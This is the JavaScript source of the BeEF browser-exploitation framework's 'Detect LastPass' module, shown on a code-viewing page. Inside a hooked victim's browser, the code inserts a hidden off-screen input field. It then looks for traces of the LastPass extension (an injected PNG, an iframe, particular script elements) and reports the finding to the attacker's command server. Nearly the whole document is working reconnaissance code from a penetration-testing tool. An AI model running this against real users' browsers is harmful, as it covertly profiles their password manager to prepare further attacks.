CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/browser/detect_lastpass/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function () {
8
	var result = "Not in use or not installed";
9
	// The following base64 encoded string represents the LastPass inline PNG which is inserted into user/pass form fields
10
	var base64PNG = "iVBORw0KGgoAAAANSUhEUgAAABAAAAASCAYAAABSO15qAAAAAXNSR0IArs4c6QAAAPhJREFUOBHlU70KgzAQPlMhEvoQTg6OPoOjT+JWOnRqkUKHgqWP4OQbOPokTk6OTkVULNSLVc62oJmbIdzd95NcuGjX2/3YVI/Ts+t0WLE2ut5xsQ0O+90F6UxFjAI8qNcEGONia08e6MNONYwCS7EQAizLmtGUDEzTBNd1fxsYhjEBnHPQNG3KKTYV34F8ec/zwHEciOMYyrIE3/ehKAqIoggo9inGXKmFXwbyBkmSQJqmUNe15IRhCG3byphitm1/eUzDM4qR0TTNjEixGdAnSi3keS5vSk2UDKqqgizLqB4YzvassiKhGtZ/jDMtLOnHz7TE+yf8BaDZXA509yeBAAAAAElFTkSuQmCC";
11

12

13
	let createInputField = function () {
14
		beef.debug("Module - Detect LastPass: Generating input field");
15

16
		return new Promise((resolve, reject) => {
17
			var input = document.createElement("input");
18
			input.type = "text";
19
			input.id = "username";
20
			input.name = "username";
21
			input.setAttribute("style", "display:none;position:absolute;visibility:hidden;top:-1000px;left:-1000px;border:none;");
22
			document.body.appendChild(input);
23
			beef.debug("Module - Detect LastPass: Input field generated");
24

25
			// FF requires some interaction to trigger extension function, so we use a timeout to wait 5 seconds in the hope that a user interacts
26
			if (beef.browser.isFF()) {
27
				setTimeout(() => {
28
					resolve();
29
				}, 5000);
30
			} else {
31
				// `1 second timout to allow DOM to update
32
				setTimeout(() => {
33
					resolve();
34
				}, 1000);
35
			}
36
		})
37
	}
38

39
	let detectLastPass = function () {
40
		beef.debug("Module - Detect LastPass: Looking for input field");
41

42
		return new Promise((resolve, reject) => {
43
			// Detect input form fields with the injected LastPass PNG as background image
44
			var bginput = $j('input[style]');
45
			var lpdiv = document.getElementById('hiddenlpsubmitdiv');
46
			if (bginput.length > 0) {
47
				beef.debug("Module - Detect LastPass: Input field with 'style' attribute found: " + bginput);
48
				for (var i = 0; i < bginput.length; i++) {
49
					beef.debug("Module - Detect LastPass: Number of potential input fields with 'style' attribute found: " + bginput.length);
50
					var styleContent = bginput[i].getAttribute('style');
51
					if (styleContent.includes(base64PNG)) {
52
						beef.debug('Module - Detect LastPass: Matching inline PNG detected');
53
						result = "Detected LastPass through presence of inline base64-encoded PNG within input form field";
54
					}
55
				}
56
				// Detect presence of LastPass iframe
57
			} else if ($j("iframe[name='LPFrame']").length > 0) {
58
				beef.debug('Module - Detect LastPass: Matching iframe found');
59
				result = "Detected LastPass through presence of LastPass 'save password' iframe";
60
				// Below is the older method of LastPass detection method
61
			} else if (typeof (lpdiv) != 'undefined' && lpdiv != null) {
62
				result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
63
			} else if ($j("script:contains(lastpass_iter)").length > 0) {
64
				result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
65
			}
66
			resolve();
67
		})
68
	}
69

70
	function getResult() {
71
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass=" + result);
72
	}
73

74
createInputField().then(detectLastPass).then(getResult);
75

76
});
77

78
Product

Resources

Company
